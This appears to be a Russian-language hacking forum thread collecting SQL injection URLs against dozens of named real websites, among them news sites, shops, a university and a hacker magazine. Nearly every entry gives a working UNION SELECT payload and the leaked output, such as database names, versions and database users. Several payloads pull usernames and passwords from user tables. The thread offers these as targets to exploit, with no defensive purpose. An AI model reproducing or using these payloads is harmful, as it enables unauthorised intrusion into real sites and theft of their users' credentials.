SQL Инъекции

Итальянский аналог журнала ][

Code:

http://www.hackerjournal.it/hj/index.php?name=PNphpBB2&file=index&c=1' 

Could not query categorie parm SELECT * FROM nuke_phpbb_categories WHERE cat_id=1\' 

http://www.hackerjournal.it/hj/index.php?name=PNphpBB2&file=index&c=1+and+substring(version(),1,1)=5 

http://www.hackerjournal.it/hj/index.php?name=PNphpBB2&file=index&c=1/**/union/**/select/**/1,version(),3,4,5/**/limit/**/1,1/* 

http://www.hackerjournal.it/hj/index.php?name=PNphpBB2&file=index&c=1/**/union/**/select/**/1,concat_ws(0x3a,username,user_password),3,4,5+from+nuke_phpbb_users/**/limit/**/2,1/*

 

Code:

http://www.sportcar-center.com/ru/news.php?type=2&id=-40+union+select+1,2,3,4,concat_ws(0x3a,database(),version(),user())--

u46954:5.0.67-log:[email protected]

Code:

http://www.witec.de/en/company/witecnews/news.php?id=-40+union+select+1,2,concat_ws(0x3a,database(),version(),user()),4,5,6--

d004aa52:5.0.45-community-log:d004aa52@localhost

 

mssql

PR 4
http://www.payglobal.com/index.asp?PID=1+or+1=@@version--

PR 5
http://robinzonada.ru/news/index.asp?id=123+or+1=@@version--

 

Code:

http://www.ufms.spb.ru/fullnews.php?id=-76+union+select+1,version(),3--

Database Version: 5.0.51a-3ubuntu5.4-log
Database name: ufms_spb_ru
User name: ufms_spb_ru@localhost

-----------------------------------------------------------------------------------------------------------

Code:

http://www.rossi-potok.ru/page.php?id=-4'+union+select+version()/*

Database Version: 4.0.17
Database name: rossip
User name: rossip@localhost

-----------------------------------------------------------------------------------------------------------

PR 5 ТИЦ 375

Code:

http://www.teatrdoc.ru/plays.php?id=-3+union+select+1,version(),3,4,5/*

Database Version: 4.1.22
Database name: kinoteatr_td
User name: [email protected]

 

Code:

http://www.southernsalestt.com/news.php?id=99999+union+select+1,concat_ws(0x3a,database(),version(),user()),3,4,5,6--

southern_db1:4.1.22-standard:southern_user1@localhost

Code:

http://www.rgbinteractive.com/company/news.php?id=99999+union+select+1,2,concat_ws(0x3a,database(),version(),user()),4--

rgb:5.0.45-community-nt:rgb@localhost

 

http://fondkadyrova.com/news.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17--
и хз шо оно сиптом прошолся результатов не дало кто поможет?

 

http://stroyshop.info/news/arhive.php?id_groups=44+union+select+1,2,3,4,version

(),6,7,8,9,10,11,12,13+/*+&typenews=1
4.1.25

http://www.detali.ru/cat/oem_NI1.asp?Serie=B14**'&Year=1999&B=-

S'+UnIon+SeLecT+1,2,user,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+--+&E=GA16DE
InfoViewer

http://www.xenon55.ru/?did=-47+union+select+1,2,3,4,5,6,7,database

(),9,10,11,12,13,14,15,16,17,18,19,20,21,22+--
u38955

 

Вот ишо:

HTML:

http://www.genoterra.ru/news/comment.php?id=-5+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,version(),database(),user()),10,11,12--
http://www.harrowgatehillfuture.co.uk/gill/comment.php?ID=-5+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6--
http://www.udka.ru/comment.php?id=-999+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--
http://www.registrazii.net/comment.php?id=-999+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17--
http://www.projectconversation.com/projectnostalgia/comment.php?ID=-5+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5--
http://www.bedroomconfession.com/comment.php?id=5+union+select+1,concat_ws(0x3a,version(),database(),user()),3--
http://www.analisi.ru/info.php?id=-8+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4--
http://www.ambler-soft.ru/info.php?section=dsp&id=-999+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5--

 

Code:

http://nadin.com.ru/hist.php?id=-1+union+select+1,concat_ws(0x3a,user(),database(),version()),3,4,5

Code:

nadina@localhost:nadina_do:5.0.67-community-log

 

Version: 4.1.22-log
User: www@localhost

Научный сайт какой-то.

 

Pagerank: 7
тИЦ: 190

Notice: Undefined index: NID in D:\Inetpub\fpseroot\news\v-modify3.php on line 114

 

Code:

http://www.ateneolawjournal.com/articlemain.php?id=-131'+union+select+1,version(),3,4,5,6,7/*

Database Version: 5.0.45-log
Database name: ateneola_www
User name: [email protected]

 

www.helicom.hr
PR3

blind

Code:

http://www.helicom.hr/artikl.php?id=-12488+union+select+1,2,3,4,5,6,7,8,9,unhex(hex(concat_ws(0x3a,user(),version(),database()))),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+admin/*

ДБ: helicom@localhost:4.1.11-Debian_4sarge7-log:helico
Табличко: admin

 

Code:

http://www.millat.com/news.php?id=-7777+union+select+1,concat_ws(0x3a,database(),version(),user()),3,4,5,6,7,8,9--

millaturdu:5.0.75:[email protected]

Code:

http://www.bp-rumyancevo.ru/news.php?id=-2+union+select+1,concat_ws(0x3a,database(),version(),user()),3,4--

rumyancevo:5.0.51a:rumyancevo@localhost

ankarpoker.ru - любителям покера

Code:

http://ankarpoker.ru/news.php?id=-1+union+select+1,concat_ws(0x3a,database(),version(),user()),3,4,5,6--

u181477:5.0.67-log:[email protected]

 

PR4

Code:

http://economice.ulbsibiu.ro/rom/eStudy/profesori.php?ID=15'+union+select+1,2,version(),4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20,21,22/*

Database Version: 5.0.27-log
Database name: fac_economice
User name: economice@localhost

 

[PR 5]

Code:

http://www.radiobanyoles.cat/noticia.php?id=-4691+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5&t=La+companyia+Yllana+torna+a+Banyoles+amb+el+seu+darrer+espectacle+Brokers

5.0.32-Debian_7etch10-log:radiobanyoles_bd:radiobanyoles@localhost
===============================
[PR 5]

Code:

http://www.aperitif-a-la-francaise.com/en/public/recettes/recette.php?id=-247+union+select+1,2,3,4,concat_ws(0x3a,version(),database(),user()),6,7,8,9,10,11,12,13,14,15,16,17

5.0.27-standard:aperitif_en:sopeuser@localhost
===============================
[PR 4]

Code:

http://www.espavino.com/spain/wine.php?id=-2257+union+select+1,2,3,4,5,concat_ws(0x3a,version(),database(),user()),7,8,9,10&wein=La%20Vi%C3%B1a

5.0.45:14913_favoriten:14913_favoriten@localhost
===============================
[PR 4]

Code:

http://modernlanguages.louisville.[COLOR=Lime]edu[/COLOR]/spanish/videos_spanish/show_video.php?id=-1067+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15&Video_Title=La%20lengua%20de%20las%20mariposas

5.0.27-standard:cml-spanish:[email protected]

Code:

http://modernlanguages.louisville.edu/spanish/videos_spanish/show_video.php?id=-1067+union+select+1,concat_ws(0x3a,id,username,passwd),3,4,5,6,7,8,9,10,11,12,13,14,15+from+cml.users

Code:

http://modernlanguages.louisville.edu/spanish/videos_spanish/show_video.php?id=-1067+union+select+1,concat_ws(0x3a,id,username,passwd),3,4,5,6,7,8,9,10,11,12,13,14,15+from+spanish.users

Code:

http://modernlanguages.louisville.edu/spanish/videos_spanish/show_video.php?id=-1067+union+select+1,concat_ws(0x3a,id,username,passwd),3,4,5,6,7,8,9,10,11,12,13,14,15+from+trinity.user

===============================
[PR 3]

Code:

http://www.domaine-la-fourmone.com/bouteille2_gb.php?id=-15+union+select+1,2,3,concat_ws(0x3a,version(),database(),user()),5,6,7,8,9,10,11,12,13,14,15,16,17

5.0.32-Debian_7etch8-log:my116691:[email protected]